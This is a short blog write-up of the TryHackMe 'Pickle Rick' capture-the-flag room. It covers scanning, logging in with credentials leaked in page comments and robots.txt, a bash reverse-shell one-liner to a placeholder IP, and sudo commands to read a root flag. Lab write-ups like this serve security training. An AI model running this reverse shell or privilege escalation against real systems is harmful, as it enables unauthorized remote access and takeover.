Pickle Rick – Easy
In this post, we’ll cover another CTF machine made by TryHackme.
Enumeration
nmap -sC -sV {ipaddress}
nikto -host {ipaddress}
gobuster -dir -u http://{ipaddress} -w /usr/share/wordlists/dirb/common.txt
The results of the nmap scan showed that there are only two ports open, 22 and 80. As soon as the nmap scan was finished, I ran nikto and gobuster scans against the host.
Meanwhile, I browsed the web application to see if there was any information disclosed/hint.
Upon analysis, I found the username “R1ckRul3s” written as a comment on the home page.
Additionally, the contents of the “robots.txt” were unusual.
Further analysis found that using the username “R1ckRul3s” and contents of “robots.txt” as the password, I was able to login to the application.
Exploitation
Once logged in to the application, we are presented with the Command Panel, where we can run system commands. Running “ls -al” shows that there are two files “Sup3rwhatever.txt” and “clue.txt”.
Let’s read the contents of both the files:
less Sup3rwhatever.txt
less clue.txt
Looking around the file system, I found another file named “second ingredients” inside rick’s home directory.
I used the following commands to set up a reverse shell and get the 3rd flag.
#Command to get reverse shell
bash -c 'bash -i >& /dev/tcp/{ipaddress}/4050 0>&1'
#List what the user can run as sudo
sudo -l
#List the contents inside the "/root" directory
sudo ls -al /root
#Get the 3rd flag value
sudo less /root/3rd.txt
Thank you for reading and stay tuned for new write-ups.
Happy Hunting!
Posted by: infinity